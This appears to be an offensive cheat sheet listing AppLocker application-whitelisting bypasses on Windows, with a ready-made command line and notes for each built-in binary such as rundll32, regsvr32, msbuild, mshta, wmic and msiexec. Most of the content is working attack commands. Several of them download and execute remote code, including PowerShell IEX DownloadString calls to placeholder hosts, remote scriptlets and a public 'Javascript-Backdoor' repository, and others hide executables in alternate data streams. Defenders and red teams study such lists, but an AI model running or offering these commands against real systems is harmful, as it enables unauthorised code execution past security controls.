Simple APPLocker bypass summary based on the extensive work of @api0cradle
- Rundll32.exe
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
rundll32.exe javascript:"..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject("WScript.Shell");w.run("calc");window.close()");
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
rundll32 shell32.dll,Control_RunDLL payload.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: No
Notes: I only tested on Windows 10 against the default rules, it could work against older Windows versions.
- Links:
- https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- Regsvr32.exe
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: No
Notes: I only tested on Windows 10 against the default rules, it could work against older Windows versions.
- Links:
- Msbuild.exe
msbuild.exe pshell.xml
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Links:
- https://gist.github.com/subTee/6b236083da2fd6ddff216e434f257614
- http://subt0x10.blogspot.no/2017/04/bypassing-application-whitelisting.html
- https://github.com/Cn33liz/MSBuildShell
- https://github.com/Cn33liz/MS17-012
- https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
- https://www.youtube.com/watch?v=aSDEAPXaz28
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- Regsvcs.exe
regsvcs.exe /U regsvcs.dll
regsvcs.exe regsvcs.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Links:
- https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- Regasm.exe
regasm.exe /U regsvcs.dll
regasm.exe regsvcs.dll
- Requires admin: /U does not require admin
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Links:
- https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- Bginfo.exe
bginfo.exe bginfo.bgi /popup /nolicprompt
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: No
Notes: Will work if BGinfo.exe is located in a path that is trusted by the policy.
- Links:
- InstallUtil.exe
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Links:
- https://github.com/subTee/AllTheThings
- https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
- http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
- https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- MSDT.exe
Open .diagcab package
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
- mshta.exe
mshta.exe evilfile.hta
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Links:
- Execute .Bat
cmd.exe /k < script.txt
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: No
Notes:
- Links:
- Execute .PS1
Get-Content script.txt | iex
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: No
Notes:
- Links:
- Execute .VBS
cscript.exe //E:vbscript script.txt
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: No
Notes:
- Links:
- PresentationHost.exe
Missing Example
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
- dfsvc.exe
Missing Example
- Requires admin: ?
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- IEExec.exe
ieexec.exe http://x.x.x.x:8080/bypass.exe
- Requires admin: ?
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- cdb.exe
cdb.exe -cf x64_calc.wds -o notepad.exe
- Requires admin: ?
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
- dnx.exe
dnx.exe consoleapp
- Requires admin: ?
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
- rcsi.exe
rcsi.exe bypass.csx
- Requires admin: ?
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
- csi.exe
Missing example
- Requires admin: ?
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
- CPL loading location manipulation
Control.exe
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
- msxsl.exe
msxsl.exe customers.xml script.xsl
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
- msiexec.exe
msiexec /quiet /i cmd.msi
msiexec /q /i http://192.168.100.3/tmp/cmd.png
- Requires admin: ?
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- cmstp.exe
cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Can also execute scriptlets - https://twitter.com/NickTyrer/status/958450014111633408 https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
- Links:
- xwizard.exe
xwizard.exe argument1 argument2
DLL loading in same folder xwizard.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- fsi.exe
fsi.exe c:\folder\d.fscript
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
- odbcconf.exe
odbcconf -f file.rsp
- Requires admin: ?
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- te.exe
te.exe bypass.wsc
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes: Can be used if the Test Authoring and Execution Framework is installed and is in a path that is whitelisted. Default location is: C:\program files (x86)\Windows Kits\10\testing\Runtimes\TAEF
- Links:
- Placing files in writeable paths under c:\windows
The following folders are by default writable and executable by normal users
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
- Requires admin: No
- Windows binary: N/A
- Bypasses AppLocker Default rules: ?
Notes: This list is based on Windows 10 1709. Run accesschk to verify on other Windows versions
- Atbroker.exe
ATBroker.exe /start malware
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- WMIC.exe
wmic process call create calc
wmic process get brief /format:"https://www.example.com/file.xsl
wmic os get /format:"MYXSLFILE.xsl"
wmic process get brief /format:"\127.0.0.1\c$\Tools\pocremote.xsl"
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
- https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
- https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
- https://gist.githubusercontent.com/caseysmithrc/68924cabbeca1285d2941298a5b91c24/raw/8574e0c019b17d84028833220ed0b30cf9eea84b/minimalist.xsl
- MavInject32.exe
MavInject32.exe /INJECTRUNNING
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
- Pubprn.vbs
pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/api0cradle/fb164762143b1ff4042d9c662171a568/raw/709aff66095b7f60e5d6f456a5e42021a95ca802/test.sct
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
- slmgr.vbs
slmgr.vbs
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Requires registry keys for com object.
- Links:
- winrm.vbs
winrm quickconfig
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Requires registry keys for com object.
- Links:
- forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- SyncAppvPublishingServer.exe
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- InfDefaultInstall.exe
InfDefaultInstall.exe shady.inf
- Requires admin: ?
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Only works on Windows 7? Windows 10 requires admin or digital signature
- Links:
- Winword.exe
winword.exe /l dllfile.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: No commonly made DLL example file
- Runscripthelper.exe
runscripthelper.exe surfacecheck \?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
- Tracker.exe
Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes: Part of Visual studio. Requires TrackerUI.dll present in 1028 subfolder.
- .WSF files
script.wsf
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes: .WSF files are supposed to not be blocked by AppLocker
- Links:
- PowerShell version 2
Powershell -version 2
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Bypasses Constrained language mode
- Links:
- CL_Invocation.ps1
. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
SyncInvoke [args]
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes, as long as PowerShell version 2 is present
Notes: Requires PowerShell version 2
- Incorrect permissions on files in folders
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Control.exe -Loading DLL/CPL binary from Alternate data stream
type notepad_reflective_x64.dll > c:\windows\tasks\zzz:notepad_reflective_x64.dll control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Requires write access to a place that is allowed by AppLocker
- Links:
- Advpack.dll - LaunchINFSection
rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Links:
- Advpack.dll - RegisterOCX
rundll32.exe advpack.dll,RegisterOCX calc.exe
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- zipfldr.dll - RouteTheCall
rundll32.exe zipfldr.dll,RouteTheCall calc.exe
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- url.dll - OpenURL
rundll32.exe url.dll,OpenURL "C:\test\calc.hta" rundll32.exe url.dll,OpenURL "C:\test\calc.url"
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
- url.dll - FileProtocolHandler
rundll32.exe url.dll, FileProtocolHandler calc.exe
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- ieframe.dll - OpenURL
rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
- shdocvw.dll - OpenURL
rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
- ieadvpack.dll - LaunchINFSection
rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1,
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- ie4unit.exe
ie4unit.exe -BaseSettings
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: No
Notes: Requires to copy out ie4unit.exe and ieuinit.inf to a user controlled folder. Also need to add SCT in the MSIE4RegisterOCX.Windows7 section
- Visual Studio Tools for Office - .VSTO files
evilfile.vsto
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: You need to build a solution using Visual Studio Tools for Office. User needs to confirm installation after executing.
- Manage-bde.wsf
cscript c:\windows\system32\manage-bde.wsf
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Need to adjust comspec variable using: set comspec=c:\windows\system32\calc.exe
- Links:
- msdeploy.exe
msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\bypass.exe & pause"
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes: Part of web deploy:
-
Links: